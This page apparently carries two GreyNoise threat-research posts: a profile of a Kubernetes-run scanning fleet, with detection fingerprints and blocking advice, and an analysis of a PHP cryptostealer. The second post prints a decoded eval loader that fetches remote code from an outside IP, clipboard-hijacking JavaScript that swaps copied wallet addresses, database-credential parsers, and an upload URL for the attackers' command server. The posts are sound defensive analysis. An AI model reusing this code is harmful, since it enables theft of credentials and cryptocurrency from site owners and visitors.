GreyNoise Labs

Bucklog’s Machine: Inside a Kubernetes Scanning Fleet

hrbrmstr — Mon, 23 Mar 2026 00:00:00 GMT

Most scanning infrastructure is boring. A VPS, a cron job, maybe a cheap proxy rotation service if the operator has ambitions. What we’re looking at with AS211590 (Bucklog SARL / FBW Networks SAS) is something else entirely – a purpose-built, Kubernetes-orchestrated scanning cluster running from a single /24 in Paris that generated 13 million sessions over 90 days and barely registered the load.

This is the walkthrough. We’ll cover how the fleet is built, what it’s doing, and what you can do about it.

The Infrastructure

The BGP prefix 185.177.72.0/24 is registered in RIPE to FBW Networks SAS, 16 rue Grange Dame Rose, Vélizy-Villacoublay, France — allocated 2025-05-27. Our 90-day analysis window for this post opens in late December 2025.

To understand why this fleet is somewhat novel/special, it helps to understand what Censys found when it looked at all 74 observable hosts in the /24: every single one runs the same Debian 12 base image (confirmed via HASSH 425d29fe50d8e4f5e37efb6e24bcf660, uniform fleet-wide), the same OpenSSH 9.2p1 configuration, and – on the 22+ confirmed Kubernetes worker nodes – an identical JARM fingerprint on port 10250 (the kubelet API). That’s not coincidence. That’s a provisioning pipeline.

The certificates tell the story even more cleanly. Every worker node presents a self-signed TLS cert on its kubelet port with a systematic naming pattern: pkNN@, where NN is a sequential node ID and the epoch timestamp matches the cert’s not_before field exactly. Node .49 holds cert pk01, provisioned 2025-12-30. Node .22 holds pk11, provisioned 2026-01-07. Twenty-five nodes numbered and timestamped in sequence – automated cluster lifecycle management, not a human typing openssl req in a terminal.

The CNI (Container Network Interface) of choice is Cilium. Two nodes expose Hubble observability ports (4244) with a shared *.kubernetes.hubble-grpc.cilium.io cert from the cluster’s internal Cilium CA. Cilium uses eBPF-based networking. The operator gets fine-grained traffic policy enforcement and — through Hubble — real-time visibility into every flow inside the cluster at the kernel level. You don’t stand up a full observability stack for a throwaway campaign. You stand it up because you want to know exactly which pods are producing which traffic, catch failures before they matter, and maintain operational discipline across a fleet that can’t afford to misbehave.

How do the pods talk to the internet? The JA4T fingerprint 65495_2-4-8-1-3_65495_7 answers that question. An MSS of 65495 only appears on loopback interfaces – the MTU is 65535, and subtract TCP/IP header overhead and you land at 65495. That fingerprint showed up on 304,807 sessions. What it means: kube-proxy or Cilium is routing outbound connections through localhost before NAT’ing them to the external interface. The pods aren’t talking to the internet directly. They go through the cluster’s networking layer first.

There’s also a 1380-byte MSS fingerprint (42780_2-4-8-1-3_1380_12) on 32,815 sessions. Standard Linux MTU is 1500 bytes; 80 bytes of overhead points squarely at VXLAN or WireGuard encapsulation. Some of this traffic traverses a tunnel inside the cluster before it exits.

The node breakdown:

Node tier	IPs	Role
Core workers (pk01–pk19)	9 IPs	96% of all sessions
Secondary tier	.61, .60, .12	~398K sessions combined
Ramp-up tier	~25 IPs (.130–.158 range)	~15K sessions, entering production
Ingress/control plane	.3	10 services including nginx Ingress, Envoy, kubelet
Management	.1, .2	SNMP, Elasticsearch (log aggregation)
Anomalous	.4, .46, .89	SMB+NFS+RPC on .4; Redis + custom ports on .46/.89

Node .2 runs Elasticsearch on 9200 and 9300. Thirteen million sessions, indexed and queryable, so the fleet maintainers can fully analyze what they’ve captured and/or diagnose campaign issues.

The Tooling Stack

Nine IPs account for 96% of 13 million sessions, with load distributed between 8.7% and 12.9% per node – a spread consistent with Kubernetes DaemonSet or Deployment scheduling. The load distribution is too even to be anything else.

The tools, by observed user agent:

Agent	Sessions	Role
curl/8.7.1	11,964,108 (91.5%)	Bulk HTTP reconnaissance
socketburst/0.1	271,344	Port/service discovery
l9explore/1.2.2	242,913	Vulnerability scanning (ProjectDiscovery)
Chrome/120 (spoofed)	142,842	Browser impersonation
l9tcpid/v1.1.0	4,256	TCP fingerprinting
python-httpx/0.28.1	867	Python HTTP client

Curl handles the volume. l9explore and socketburst handle discovery. l9tcpid fingerprints services for the target list. The Chrome spoof (~15K sessions) gets used selectively where a browser UA gets different responses. This appears to be a part of a deliberate pipeline, moving from inventory collection to full-scale exploit operations.

The JA4H fingerprints confirm the split:

JA4H	Sessions	Interpretation
ge11nn14enus_16e29da98f67	8,937,713	GET, 14 headers, en-US – primary curl scanner
po11nn16enus_6291b5733205	2,087,283	POST, 16 headers, en-US – n8n exploitation
ge11nn050000_3658ef221638	351,749	GET, 5 headers, no locale – l9explore
ge11nn040000_8391bea91fb6	245,432	GET, 4 headers, no locale – socketburst

The POST fingerprint (2.09M sessions) maps directly to the n8n exploitation campaign. 16 headers on POST vs. 14 on GET tracks with the addition of Content-Type and payload headers.

The Lifecycle

The fleet’s activity across our 90-day observation window (chosen only for data convenience) follows a pattern consistent with a professional deployment.

Phase 1 – Commissioning (Dec 24 – Jan 2): Under 4,000 sessions/day. Infrastructure testing. The first week: 1,167 sessions total.

Phase 2 – Initial operations (Jan 3 – Jan 11): 12K–80K/day. First sustained scanning run, 275,885 sessions in the week of Jan 5. Core patterns established.

Phase 3 – Operational pause (Jan 12 – Jan 18): Volume drops to under 6,000/day. Either infrastructure reconfiguration or deliberate tempo management.

Phase 4 – Sustained scanning (Jan 19 – Feb 10): 10K–150K/day across two consecutive weeks. Building coverage, not sprinting.

Phase 5 – Full-scale operations (Feb 12 – Mar 23): The step-change. Daily volume: 50K–987K. Peak on February 23: 987,094 sessions – a 170x increase from the Phase 3 lull.

Weekly sessions in Phase 5:

Week of	Sessions
Feb 9	1,508,612
Feb 16	1,791,082
Feb 23	1,983,061
Mar 2	1,403,226
Mar 9	2,608,825
Mar 16	1,906,230

Phase 5 began February 12. The US/Israel-Iran conflict started February 27. That’s a two-week gap we’ll come back to in a bit.

What the Fleet Is Actually Doing

Credential harvesting

This is the dominant mission. The fleet sweeps for configuration files that contain secrets – and it does so with the systematic thoroughness of something that has all the time in the world and a lot of CPU to spend.

Activity	Sessions	Target
.env file harvesting	3,543,359	API keys, database credentials, secrets
Generic sensitive file access	3,161,498	Broad configuration file patterns
/proc enumeration	2,128,282	Container escape paths, system info
Git config crawling	594,049	Repository credentials, internal URLs
PHP info	286,643	Server configuration disclosure
AWS credential files	173,167	IAM keys, access credentials
WordPress config	10,319	Database credentials

The .env crawling hits 30+ path variants — /backend/.env, /api/.env, and 28+ additional paths, totaling roughly 200K sessions across variants. This is directory fuzzing vs. targeted exploitation. The fleet probes every plausible location for secrets, then moves on.

n8n exploitation (CVE-2026-21858)

The single largest specific campaign: 1,028,562 sessions targeting n8n workflow automation endpoints.

CVE-2026-21858 is a CVSS 10.0 unauthenticated arbitrary file access vulnerability. The fleet fuzzes approximately 100 unique /form/* and /webhook/* paths at roughly 10K requests each, probing for active n8n workflow endpoints that accept unauthenticated form submissions. The 2.09M POST sessions (JA4H po11nn16enus_6291b5733205) are this campaign.

One layer deeper: CVE-2025-68613, a CVSS 9.9 n8n RCE with a Metasploit module, is linked by Akamai to ZeroBot malware and MuddyWater – an Iranian APT. Bucklog is not the same as MuddyWater. We cannot make that attribution from scanning data. What we can say: the n8n CVE ecosystem is under active exploitation, the fleet has n8n as its single largest specific target, and there’s a documented Iranian APT connection to the same CVE family.

As an aside, n8n has accumulated 22 CVEs in the past three months, 10 rated Critical. Perhaps one should consider finding another automation platform if you still use n8n?

Evasion and active exploitation

Beyond credential harvesting and n8n, the fleet runs a broader exploitation portfolio:

CVE / Technique	Sessions	Target
CVE-2026-21858 (n8n file access)	1,028,562	Workflow automation
Double URL encoding	75,901	WAF bypass
Generic path traversal	141,289	LFI exploitation
CVE-2024-29291 (Laravel)	13,109	Credential leak
CVE-2024-44000 (WP LiteSpeed)	12,549	WordPress plugin
CVE-2020-5284 (Next.js)	4,696	Directory traversal
CVE-2025-2264 (Sante PACS)	4,124	Healthcare PACS
CVE-2017-9841 (PHPUnit)	3,287	Classic RCE
CVE-2025-48927 (TeleMessage)	2,432	Spring Boot heap dump

The double URL encoding (75K sessions) specifically targets WAF pattern matching that only decodes once. If your WAF sees %252e%252e and doesn’t second-decode it, the traversal gets through.

CVE-2025-2264 targeting Sante PACS is only 4,124 sessions – small by this fleet’s standards – but medical imaging systems are critical infrastructure. Healthcare organizations should audit Sante PACS exposure regardless of session count.

Target Selection: The Conflict Angle

The fleet probes 47+ distinct sensor profile types with a pretty deliberate composition.

Perimeter and VPN devices:

Persona	Sessions
Palo Alto NGFW + PAN-OS	245,995
SonicWall SonicOS + Gen7	242,628
Cisco ASA + ASA Software	158,628
pfSense	126,706
Zyxel USG40	91,060
Checkpoint Firewall-1	90,396
Juniper SRX210	89,293

Surveillance systems:

Persona	Sessions	Note
TrendNet IP Camera	153,971
Dahua Camera	100,773	CyberAv3ngers documented target
Intelbras Camera	100,301
Hikvision	78,572	CyberAv3ngers documented target
Geovision	71,287
Bosch Alarm Panel	74,682

CyberAv3ngers is an IRGC-affiliated group with a documented pattern of targeting Dahua and Hikvision surveillance systems. Both are in this fleet’s top surveillance targets. That could be coincidence. The temporal alignment makes coincidence a less comfortable explanation.

Phase 5 escalation began February 12. The US/Israel-Iran conflict onset: February 27. Fifteen days prior, this fleet went from 150K sessions/day to a trajectory ending at 987K. A reasonable interpretation: pre-positioning. Establishing access breadth before a conflict window opens, so that selective exploitation can begin once it does. This comes from preliminary analysis – direct attribution to any state actor is not supported by the available data – but the combination of target selection, timing, and n8n/MuddyWater overlap is hard to set aside.

What You Can Do About It

Block it

The entire /24 is unified infrastructure. No shared SSH host keys between nodes (each is unique, consistent with proper Kubernetes provisioning), but every single observable host shares the same base image, the same HASSH, and the same operational purpose. There is no evidence of legitimate third-party tenancy in this prefix.

Block 185.177.72.0/24 (AS211590 BUCKLOG) at your perimeter. If you don’t expect traffic from a French scanning cluster, this is a clean block.

Detect it

These fingerprints identify the fleet with low false-positive rate:

Signal	Value	Notes
JA4H (GET scanner)	`ge11nn14enus_16e29da98f67`	8.9M sessions, primary curl scanner
JA4H (POST/n8n)	`po11nn16enus_6291b5733205`	2.1M sessions, n8n exploitation
JA4T (K8s loopback)	`65495_2-4-8-1-3_65495_7`	MSS 65495 = Kubernetes pod routing
HASSH (SSH server)	`425d29fe50d8e4f5e37efb6e24bcf660`	Uniform across all 74 nodes
JARM (kubelet)	`3fd3fd20d00000000043d3fd3fd43d684d61a135bd962c8dd9c541ddbaefa8`	All K8s worker nodes
User agent	`curl/8.7.1`	Combined with 14+ headers and en-US locale

The JA4H fingerprint ge11nn14enus_16e29da98f67 is the reliable signal here — 14 headers plus en-US locale is a specific combination that doesn’t require trusting the UA string, which is trivially changed. Alert on double-encoded path traversal (%252e%252e) regardless of source.

Patch and protect

Patch n8n now. CVE-2026-21858 (CVSS 10.0) and CVE-2025-68613 (CVSS 9.9, Metasploit module available) are both active targets. If patching isn’t immediate, restrict /form/* and /webhook/* to authenticated access at the network layer.
Audit your .env exposure. Check that your web server blocks dotfile access. Verify .env, .aws/credentials, and .git/config aren’t reachable from your document root. A fleet running 3.5M sessions against these paths will find any that you’ve missed.
Healthcare organizations: Audit Sante PACS installations for CVE-2025-2264.
Monitor the ramp-up tier. The .130–.158 range (~25 IPs) is entering production now. Extend your blocks and monitoring to the full /24, not just the 9 core workers.

GNQL Queries

Fleet overview (last 7 days):

metadata.asn:AS211590 last_seen:7d

n8n exploitation activity:

metadata.asn:AS211590 tags:"n8n CVE-2026-21858 Attempt" last_seen:7d

ENV crawling:

metadata.asn:AS211590 tags:"ENV Crawler" last_seen:7d

Core worker IPs:

ip:185.177.72.13 OR ip:185.177.72.49 OR ip:185.177.72.38 OR ip:185.177.72.23 OR ip:185.177.72.52 last_seen:7d

Surveillance persona targeting (Session Explorer):

sourceMetadata.asn:AS211590 AND gnMetadata.persona.name:("Dahua Camera" OR "Hikvision" OR "TrendNet IP Camera")

What to Watch

Watch the ramp-up tier. When the ~25 nodes in the .130–.158 range reach full production, the fleet’s daily ceiling moves substantially higher than the current 987K peak.

The n8n CVE chaining risk is real. CVE-2026-21858 provides unauthenticated file access; CVE-2025-68613 provides RCE via expression evaluation. A fleet already running 1M sessions against n8n endpoints that has access to a Metasploit module for the RCE follow-on is a meaningful threat to any exposed n8n instance.

We’ll continue tracking AS211590 activity. If the conflict-tempo hypothesis holds, the next escalation point should be visible in the session data before it shows up anywhere else.

What’s That String? That Time a Weird String Revealed a Whole Operation

Brianna Cluck — Tue, 24 Feb 2026 00:00:00 GMT

How it felt to work on this post. Shikanoko Nokonoko Koshitantan is written by Takashi Aoshima and published by Wit Studio.

It all started with a slack message from boB Rudis:

“Hey, I keep seeing this string. Any ideas?”

d2=%3D%3DQXisTKpcCd4RnLsF3ckN3LlR2bj9yN4EzL3gTMvUjMx4COyIjL1QTMuUDNv8iOwRHdodCKzRnblRnbvN2X0V2ZfVGbpZGKsFmdlBkIsIiIsIibvlGdj5Wdm9VZ0FWZyNmIsIyYuVnZfJXZzV3XsxWYjJyW

It certainly seemed weird. The judicious amount of %3D meant it was likely URL encoded. Decoded that and got this:

d2===QXisTKpcCd4RnLsF3ckN3LlR2bj9yN4EzL3gTMvUjMx4COyIjL1QTMuUDNv8iOwRHdodCKzRnblRnbvN2X0V2ZfVGbpZGKsFmdlBkIsIiIsIibvlGdj5Wdm9VZ0FWZyNmIsIyYuVnZfJXZzV3XsxWYjJyW

I thought maybe it was a cookie value at first, then Ron said “Hey, this looks like backwards base64.”

Dear reader, I cannot describe the joy I have at working with the type of person who can look at a string and go “ah yeah, backwards base64.”

He proved it with a couple of ruby commands, and I double checked on my end by putting it into cyberchef, removing the d2= at the beginning, and then setting the recipe to reverse the string and decode base64.

The end result:

["call_user_func","create_function","","@eval(file_get_contents('http://45.145.228.125/187/187/code/sdsql.txt'));"]

Wow! Looks like we’ve got something here!

Don’t Try This At Home

Having a link, and a file to download that was definitely going to be something unsavory, I did what I tell everyone I know not to do, and I purposely downloaded the file. I named it “shadyaf.txt” to remind myself to absolutely, under no circumstances, actually run the code in the file. So, what do we have?

@ini_set('output_buffering', '0');
@ini_set('zlib.output_compression', 0);
@ini_set('implicit_flush', 1);
ob_implicit_flush(true);

// 确保错误显示开启
@ini_set("display_errors", "1");
@error_reporting(E_ALL);

// 设置脚本执行参数
@ignore_user_abort(true);
@set_time_limit(0);
@ini_set('memory_limit', '1024M');

// 立即发送响应头，让客户端知道请求已接收
header('Content-Type: text/plain; charset=utf-8');
echo "脚本已启动，正在后台执行...\n";
echo "详细日志请查看: /tmp/" . (isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : 'unknown') . "db_script_error.log\n";

// 立即刷新输出缓冲区
ob_end_flush();
flush();

This is only the first few lines, for reasons that will soon become obvious.

@ini_set is a phpism, so we’ve got a good place from which to start. What do the comments say? No idea! While I’m studying Mandarin for situations exactly like this, my current skills are more “Hello, how are you? Thank you, goodbye!” and less “here is documentation.”

So, off to the online translator. I used Kagi Translate for this, but I’m sure google translate, deepL, or scanning the comments into pleco could get you there all the same.

Let’s take a look at the same code again, but next to the simplified Chinese comments I will insert the translation:

@ini_set('output_buffering', '0');
@ini_set('zlib.output_compression', 0);
@ini_set('implicit_flush', 1);
ob_implicit_flush(true);

// 确保错误显示开启 -> Make sure error display is turned on
@ini_set("display_errors", "1");
@error_reporting(E_ALL);

// 设置脚本执行参数 -> Set script execution parameters
@ignore_user_abort(true);
@set_time_limit(0);
@ini_set('memory_limit', '1024M');

// 立即发送响应头，让客户端知道请求已接收 -> Send the response headers immediately to let the client know the request has been received.
header('Content-Type: text/plain; charset=utf-8');
echo "脚本已启动，正在后台执行...\n"; //Script started, running in the background...
echo "详细日志请查看: /tmp/" . (isset($_SERVER['HTTP_HOST'])//For detailed logs, please check: /tmp/
 ?  $_SERVER['HTTP_HOST'] : 'unknown') . "db_script_error.log\n";

// 立即刷新输出缓冲区 -> Flush the output buffer immediately
ob_end_flush();
flush();

Pretty normal startup text, except putting logs in /tmp/ is an interesting choice. /tmp/ is the temporary folder on a Unix or Linux system, being a folder held in memory. When you turn the computer off, /tmp/ gets wiped. It’s a popular choice to store scripts and logs in /tmp/ if you would like whoever is running the computer to not know what you’re doing.

I then skimmed through more of the script. Usually, if I’m reading a script for the first time, I skim the parts that seem normal-ish and then use anything strange looking as a jumping off point to dig deeper. With that in mind, while there’s some interesting stuff about detecting pid numbers and php versions, I only paused when I found this line.

// ==================== 加密货币地址替换功能 ==================== ->Cryptocurrency address replacement feature
function execute_crypto_replacement() {
    db_log_error("开始执行加密货币地址替换功能");
    
    // 新的加密货币地址 ->New cryptocurrency address
    $new_addresses = аrrау ([
      'trc' => 'TXrn6VVdcCDeQvc4B6MBweN3L9dHPppNkq',
      'eth' => '0x8f5514751585f37d5d4949b7673f420aafe7cfc4',
      'btc' => 'bc1quzk7um3n0nu9wfsdmkseuh7m359t4eq89snuyu',
      'btc1' => '1QJXBe2sKFo3hDS4yqDRnm967zRRz4XTrN',
      'btc3' => '36KdRf3KALiiNQbnakiSxKjE13ocd1vV4j',
    ]);
    
    $ocwd = "/www/wwwroot";
    $jsstr = base64_encode("(function(){function rca() {const tar = /(?:\\b|[^A-Za-z0-9])T[a-zA-Z0-9]{33}(?:\\b|[^A-Za-z0-9])/g,ear = /(?:\\b|[^A-Za-z0-9])0x[a-fA-F0-9]{40}(?:\\b|[^A-Za-z0-9])/g,bar = /(?:\\b|[^A-Za-z0-9])(?:1[a-km-zA-HJ-NP-Z1-9]{25,34})(?:\\b|[^A-Za-z0-9])/g,bar0 = /(?:\\b|[^A-Za-z0-9])(?:3[a-km-zA-HJ-NP-Z1-9]{25,34})(?:\\b|[^A-Za-z0-9])/g,bar1 = /(?:\\b|[^A-Za-z0-9])(?:bc1q[a-zA-Z0-9]{38})(?:\\b|[^A-Za-z0-9])/g,bar2 = /(?:\\b|[^A-Za-z0-9])(?:bc1p[a-zA-Z0-9]{58})(?:\\b|[^A-Za-z0-9])/g;document.addEventListener('copy', function(e) {const ttc = window.getSelection().toString();if (ttc.match(tar)) {const ncd = ttc.replace(tar, '".$new_addresses['trc']."');e.clipboardData.setData('text/plain', ncd);e.preventDefault();} else if (ttc.match(ear)) {const ncd = ttc.replace(ear, '".$new_addresses['eth']."');e.clipboardData.setData('text/plain', ncd);e.preventDefault();} else if (ttc.match(bar)) {const ncd = ttc.replace(bar, '".$new_addresses['btc1']."');e.clipboardData.setData('text/plain', ncd);e.preventDefault();} else if (ttc.match(bar0)) {const ncd = ttc.replace(bar0, '".$new_addresses['btc3']."');e.clipboardData.setData('text/plain', ncd);e.preventDefault();} else if (ttc.match(bar1)) {const ncd = ttc.replace(bar1, '".$new_addresses['btc']."');e.clipboardData.setData('text/plain', ncd);e.preventDefault();} else if (ttc.match(bar2)) {const ncd = ttc.replace(bar2, '".$new_addresses['btc']."');e.clipboardData.setData('text/plain', ncd);e.preventDefault();}});}setTimeout(()=>{const obs = new MutationObserver(ml => {for (const m of ml) {if (m.type === 'childList') {rca();}}});obs.observe(document.body, { childList: true, subtree: true });},1000);rca();})();");
    $str = base64_encode("\$content=str_replace(\"\",\"\",\$content);");

As soon as I saw this and the translation, I sent a quick message to the team:

[1:56 PM]they commented their code, which is really sweet of them.  translating now

[1:59 PM]it's a crypto miner

So, what are we looking at?

Let’s go over it in smaller chunks.

// ==================== 加密货币地址替换功能 ==================== ->Cryptocurrency address replacement feature
function execute_crypto_replacement() {
    db_log_error("开始执行加密货币地址替换功能"); //Initiate cryptocurrency address replacement function
    
    // 新的加密货币地址 ->New cryptocurrency address
    $new_addresses = аrrау ([
      'trc' => 'TXrn6VVdcCDeQvc4B6MBweN3L9dHPppNkq',
      'eth' => '0x8f5514751585f37d5d4949b7673f420aafe7cfc4',
      'btc' => 'bc1quzk7um3n0nu9wfsdmkseuh7m359t4eq89snuyu',
      'btc1' => '1QJXBe2sKFo3hDS4yqDRnm967zRRz4XTrN',
      'btc3' => '36KdRf3KALiiNQbnakiSxKjE13ocd1vV4j',
    ]);

The nicely-bannered name of this function tells us that we are going to be replacing some cryptocurrency wallet addresses. We then get an array of cryptocurrency wallets.

The first wallet was confusing at first. I recognized TRC as the short name for terracoin, but that’s not a valid wallet value for it. Turns out it’s TRON.

The second wallet is ethereum, the third wallet is bitcoin, and the wallets labelled ‘btc1’ and ‘btc3’ (they couldn’t have kept their numbering scheme the same?) are polyglot wallets, working for both bitcoin and the rapid transaction-ready bitcoin cash coin.

We will look at these wallets in a little bit. Trust me, it gets fun. For now, we’re going to put this info in our back pocket and keep looking at interesting parts of the script.

“What else is there?” -Prince Derek, The Swan Princess (1994)

One other oddity in this script is how it looks for database config files.

    // ==================== 数据库配置文件解析函数 ==================== ->Database configuration file parsing function
    function db_parsePhpArrayConfig($content, $file) {
        db_log_error("尝试解析PHP数组配置: " . basename($file));
        
        if (!preg_match('/return\s*\[\s*(.*?)\s*\]\s*;/s', $content, $arrayMatch)) {
            return [];
        }

        $dbConfig = [
            'hostname' => 'localhost',
            'database' => '',
            'username' => '',
            'password' => '',
            'hostport' => '3306'
        ];
        
        $patterns = [
            'hostname' => "/'hostname'\s*=>\s*(?:(Env::get\([^,]+,\s*'([^']+)'\))|'([^']*)'|\\$[a-zA-Z0-9_]+\[['\"]([^'\"]+)['\"]\])/",
            'database' => "/'database'\s*=>\s*(?:(Env::get\([^,]+,\s*'([^']+)'\))|'([^']*)'|\\$[a-zA-Z0-9_]+\[['\"]([^'\"]+)['\"]\])/",
            'username' => "/'username'\s*=>\s*(?:(Env::get\([^,]+,\s*'([^']+)'\))|'([^']*)'|\\$[a-zA-Z0-9_]+\[['\"]([^'\"]+)['\"]\])/",
            'password' => "/'password'\s*=>\s*(?:(Env::get\([^,]+,\s*'([^']+)'\))|'([^']*)'|\\$[a-zA-Z0-9_]+\[['\"]([^'\"]+)['\"]\])/",
            'hostport' => "/'hostport'\s*=>\s*(?:(Env::get\([^,]+,\s*'([^']+)'\))|'([^']*)'|\\$[a-zA-Z0-9_]+\[['\"]([^'\"]+)['\"]\])/"
        ];

So, it looks for config files for thinkPHP, using some regex to find keys and values for the hostname, database name, username, password and port number. It’s what I would do if I was trying to read as much info as possible, but one part stuck out to me as weird.

After looking for this info, it has a specific function to make sure it’s looking at ThinkAdmin databases.

        $isThinkAdmin = (strpos($content, 'ThinkAdmin') !== false || 
                        (strpos($content, 'zoujingli/ThinkAdmin') !== false));
        
        if (!empty($foundKeys['database']) && !empty($foundKeys['username'])) {
            db_log_error("成功解析PHP数组配置"); //->Successfully parsed PHP array configuration
            return [[
                'type' => $isThinkAdmin ? 'thinkadmin' : 'php_array',
                'config' => $dbConfig
            ]];

ThinkAdmin is management software for ThinkPHP, which is itself a PHP framework as part of the Think suite of tools.

So, it’s looking for ThinkAdmin so it knows what to look for. I am not an expert in PHP by any stretch of the imagination but, given all the sites related to this being written in Chinese (simplified) my guess is that Think* programs are mostly aimed at a Chinese audience. The plot thickens!

Or does it?

Fear not, American web developer, they’ve got you covered.

 function db_parseWordPressConfig($content, $file) {
        $basename = basename($file);
        if ($basename !== 'wp-config.php') return [];
        
        db_log_error("尝试解析WordPress配置: $basename"); //->Attempting to parse WordPress configuration
        
        $dbConfig = array(
            'hostname' => 'localhost',
            'database' => '',
            'username' => '',
            'password' => '',
            'hostport' => '3306'
        );

They also look for Wordpress php databases 🙂

They actually look for and parse a lot of files. Here’s the list from the main parsing function:

        $parsers = [
            'db_parseWordPressConfig',
            'db_parseThinkPhpConfig',
            'db_parseNestedPhpConfig',
            'db_parsePhpArrayConfig',
            'db_parseEnvDefaultConfig',
            'db_parseEnvSectionConfig',
            'db_parseEnvConfig',
            'db_parseIniConfig',
            'db_parseDefineConfig',
            'db_parseFallbackConfig'
        ];

This cryptostealer is more thorough about edge case configs than I am when I’m writing code for myself, but I’m trying not to let that bum me out too much.

But what’s it trying to do with all this database info? So glad you asked!

    // ==================== 数据库替换主逻辑 ====================->Main database replacement logic
    try {
        db_log_error("===== 数据库替换主逻辑开始 ====="); //->Database replacement main logic start
        echo "=== 数据库扫描与替换脚本 ===\n"; //->Database scan and replace script
        echo "版本: 2024-05-20 (修复版 - 严格长度检测)\n\n"; //->Version: 2024-05-20 (Fixed Version - Strict Length Detection)

First, it looks for your databases. Then, it assigns a unique id to each and tries to connect over mysql. Assuming it succeeds in that, it shows you a list of all the tables it found.

                // 获取所有表 ->Get all tables
                $tables = array();
                $result = $conn->query("SHOW TABLES");
                if (!$result) {
                    echo "  [!] 获取表列表失败: " . $conn->error . "\n"; //->Failed to retrieve table list
                    db_log_error("SHOW TABLES失败: " . $conn->error); //->SHOW TABLES failed
                    $conn->close();
                    continue;

After enumerating your databases and listing all your tables, it pulls some “sample data” from each table.

After that, you get an extremely ominous function.

    // ==================== 数据库替换主逻辑 ==================== ->Main database replacement logic
    try {
        db_log_error("===== 数据库替换主逻辑开始 ====="); //->Database replacement main logic start
        echo "=== 数据库扫描与替换脚本 ===\n"; //->Database scan and replace script
        echo "版本: 2024-05-20 (修复版 - 严格长度检测)\n\n"; //->Version: 2024-05-20 (Fixed Version - Strict Length Detection)

It goes through each of your databases, ini files, config files and .env files and, using user-submitted rules, methodically goes through and replaces every matched entry with whatever you want it to say.

What is the typical replacement data? I’m not sure at the moment. It could be a ransom note, or replacing more crypto wallets with the script’s wallets, or making data just a little bit wrong to throw off some larger process that I’m otherwise not seeing.

Either way, this has a timestamp and “fixed version,” implying some amount of project maintenance and bug squashing done by whoever is using this.

After doing its thing, it packs up the table info, collected samples, log files, pid files and client info and uploads to a command and control server.

$url = 'http://c2c.deepgtp.net:39010/api/upload';

The c2c subdomain is an nginx server on ubuntu on a server in japan, per URLScan. I was curious what the top level domain looked like, so I tried www as well. Turns out their www is in a tencent datacenter in singapore. Neat!

….also neat is what their www domain is saying.

mail.deepgtp.net API Gateway

Available endpoints:
- GET/POST /api/email/verify
- GET /health

A mail server, you say? Let’s jiggle the doorknobs. I connected to our slightly shady VPN and followed the instructions on the website.

localhost% curl --request GET --url https://mail.deepgtp.net/health
{"status":"ok","stored_emails":7}

curl --request GET --url https://mail.deepgtp.net/api/email/verify
{"detail":"Method Not Allowed"}dig mail.deepgtp.net/health

; <<>> DiG 9.20.18 <<>> mail.deepgtp.net/health
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 62317
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4095
;; QUESTION SECTION:
;mail.deepgtp.net/health.       IN      A

;; AUTHORITY SECTION:
.                       86399   IN      SOA     a.root-servers.net. nstld.verisign-grs.com. 2026021102 1800 900 604800 86400

;; Query time: 39 msec
;; SERVER: 100.100.100.100#53(100.100.100.100) (UDP)
;; WHEN: Wed Feb 11 23:23:46 EST 2026
;; MSG SIZE  rcvd: 127

Interesting. No immediately visible MX server. I wonder if they’re actually using an email protocol or if it’s a front end for sending log files. I tried sending a GET request and a POST request to the upload api endpoint to see if I got any message, but didn’t get one.

Follow The Money

Now that we’ve gone over the script and tried to spy on the c2 server, let’s get back to those crypto wallets.

Counting two extra wallet addresses from the bottom of the script, we have the following wallets:

BTC:
btc:bc1quzk7um3n0nu9wfsdmkseuh7m359t4eq89snuyu
btc1:1QJXBe2sKFo3hDS4yqDRnm967zRRz4XTrN
btc3:36KdRf3KALiiNQbnakiSxKjE13ocd1vV4j

ETH:
eth1:0x8f5514751585f37d5d4949b7673f420aafe7cfc4
eth2:0x77843290a868e4F789619D8B4D2074BD5DF4C91d

TRON:
tron1:TXrn6VVdcCDeQvc4B6MBweN3L9dHPppNkq
tron2:TAM8cBHRFTwVi4o18iQzyUL4JxujyZMPik

What activity are we seeing on these wallets?

The first bitcoin wallet listed was part of a 105 wallet transfer from a much larger wallet. That wallet only gained $126, but the total moved out of the larger wallet was over 12,000 dollars. That’s huge!

The second wallet had no activity.

The third wallet had some activity, though not as much.

The first ethereum wallet had no transactions. The second wallet had several small transactions from other wallets going into it

The first tron wallet has smaller transactions. The second wallet has $2527.77, mostly in tethered USD token, a stablecoin meant to have a 1:1 value ratio with the US dollar.

The charts tell an interesting story. Let’s start with the bitcoin wallets.